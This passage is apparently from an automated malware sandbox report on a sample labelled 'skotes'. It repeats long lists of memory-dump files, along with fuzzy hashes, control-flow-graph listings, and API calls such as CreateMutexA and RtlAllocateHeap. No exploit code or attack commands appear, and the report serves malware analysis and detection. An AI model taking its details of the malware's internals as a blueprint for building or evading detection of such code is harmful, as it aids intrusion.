                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: c5b40520508a9bfd79ebcafa22daa4a71e3ab165d496203401813604f6ba040b
                                                                                                                                                                                                                                          • Instruction ID: d3eafa6c64f0e539074e87bda34f264319536bdaf19d878ed5732e1a48992535
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b40520508a9bfd79ebcafa22daa4a71e3ab165d496203401813604f6ba040b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54216A7124C201CBEB6467789C96B2DB7D2DFC1300F2488EAE16CD62D2DE7688808253

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 292 b7a34f-b7a35b 293 b7a371-b7a39a call b8d663 292->293 294 b7a35d-b7a36b 292->294 300 b7a39c-b7a3a8 293->300 301 b7a3c8-b7a916 call b880c0 293->301 294->293 295 b7a93a 294->295 298 b7a953-b7a994 Sleep CreateMutexA 295->298 299 b7a93a call ba6c6a 295->299 306 b7a9a7-b7a9a8 298->306 307 b7a996-b7a998 298->307 299->298 303 b7a3be-b7a3c5 call b8d663 300->303 304 b7a3aa-b7a3b8 300->304 303->301 304->295 304->303 307->306 310 b7a99a-b7a9a5 307->310 310->306
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 2d1231b4b6081575cc3324fb9e3f47f7a44eb850913a87332606ca27a20a768f
                                                                                                                                                                                                                                          • Instruction ID: 25f3144f3562634f800e0d3034c2eca84d8fa10fcb798dc1e7a68aa7ac35c93f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d1231b4b6081575cc3324fb9e3f47f7a44eb850913a87332606ca27a20a768f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12214C316042049BEB18AF68DC8576CF7E2EBD6310F2482A9E42CD77D1D7759580C752

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 351 bad82f-bad83a 352 bad848-bad84e 351->352 353 bad83c-bad846 351->353 355 bad850-bad851 352->355 356 bad867-bad878 RtlAllocateHeap 352->356 353->352 354 bad87c-bad887 call ba75f6 353->354 361 bad889-bad88b 354->361 355->356 357 bad87a 356->357 358 bad853-bad85a call ba9dc0 356->358 357->361 358->354 364 bad85c-bad865 call ba8e36 358->364 364->354 364->356
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BAA813,00000001,00000364,00000006,000000FF,?,00BAEE3F,?,00000004,00000000,?,?), ref: 00BAD871
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: af97831d3725c05cdad66412e28b4716725d03354037a7cbf5df8536c337199d
                                                                                                                                                                                                                                          • Instruction ID: e970bf32d98f232dafea7469c56d6524ceb09d404033ea1a652fdae6a907c275
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af97831d3725c05cdad66412e28b4716725d03354037a7cbf5df8536c337199d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3F02E3164D12466DB213B729C01A5B77D9DF47370B1480E1EC0697981DF38DC0081E0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                          • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                          • Instruction ID: aa4686e9587e7ded220a5291786af77e32d18c311b138c076df228285fc14472
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EB104329086859FDB15CF28C8817BEBFE5EF56350F1481FAE855EB242D6349D01CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
